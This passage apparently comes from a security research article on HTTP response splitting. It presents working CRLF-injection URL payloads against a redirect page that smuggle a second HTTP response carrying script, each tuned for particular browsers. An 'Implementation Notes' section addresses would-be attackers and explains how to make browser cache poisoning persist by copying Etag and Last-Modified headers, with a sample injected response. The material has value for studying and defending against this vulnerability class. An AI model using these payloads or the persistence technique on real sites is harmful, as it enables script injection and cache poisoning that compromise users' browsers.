For some reason I can't seem to get Firefox to use the headers I provide, but you can easily inject into the top of the page, and simply make the browser not render the rest by using an unclosed div tag with a display: none style attribute.

Opera 9 (as I mentioned earlier) though, just doesn't want to make the request on the same socket, and so I haven't been able to get this attack to work.

2.3 Working Exploits



Now, onto the interesting part - Working Exploits.

This *works* (To the extent explained above) in both IE and Firefox:

http://www.dataplace.org/redir.html?url=index.html%0d%0aKeep-Alive: timeout=60%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 0%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        %0d%0aHTTP/1.x 200 OK%0d%0aKeep-Alive: timeout=5%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 55%0d%0a%0d%0a<html><script>alert(document.location)</script></html>


But it doesn't work on Opera 8. Opera 8 works the way you would sort of expect a browser to work, in that it begins reading the stream from where it left off, and so we don't need to provide much whitespace:

http://www.dataplace.org/redir.html?url=index.html%0d%0aKeep-Alive: timeout=60%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 0%0d%0a%0d%0a%0d%0aHTTP/1.x 200 OK%0d%0aKeep-Alive: timeout=5%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 55%0d%0a%0d%0a<html><script>alert(document.location)</script></html>



3.0 Implementation Notes



If anyone wants to use this to perform browser cache poisoning attacks (either to hide the suspicious URL or something similar), the best approach would probably be to check whether the URL you are poisoning sends an Etag header, and if so, replicate that header, so that when the browser later revalidates the resource, the web server will honestly say it hasn't changed. If the resource you want to poison is dynamic, you'll have to rely on the Cache-Control and Date headers alone (though these should be used along with the Etag header anyway).
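For example, the injected response might replicate the real resource's validators like so (all values illustrative):

HTTP/1.x 200 OK
Content-Type: text/html
Etag: "1164d9-2c3-45f0a8c0"
Last-Modified: Thu, 01 Feb 2007 00:00:00 GMT
Cache-Control: max-age=86400
Content-Length: 55

<html><script>alert(document.location)</script></html>

That way, when the browser later revalidates with the copied values in If-None-Match/If-Modified-Since, the real server will respond 304 Not Modified, and the poisoned copy stays in the cache.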


4.0 Conclusion



So as we can see, we don't need a proxy to implement interesting protocol oriented HTTP Response Splitting attacks; hopefully someone with a deeper understanding of browsers than me can figure out why the above attacks aren't working in Firefox and Opera 9.